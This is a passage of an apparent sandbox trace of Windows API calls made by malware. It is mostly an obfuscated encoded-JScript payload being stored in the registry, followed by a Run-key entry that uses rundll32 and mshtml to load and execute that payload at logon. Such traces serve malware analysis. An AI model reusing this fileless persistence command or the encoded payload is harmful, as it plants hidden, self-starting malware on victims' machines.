3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0092.225] RegCloseKey (hKey=0xa8) returned 0x0 [0092.225] Sleep (dwMilliseconds=0x1388) [0097.231] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x240, lpdwDisposition=0x0) returned 0x0 [0097.231] NtSetValueKey (in: KeyHandle=0x240, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0097.232] RegSetValueExW (in: hKey=0x240, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 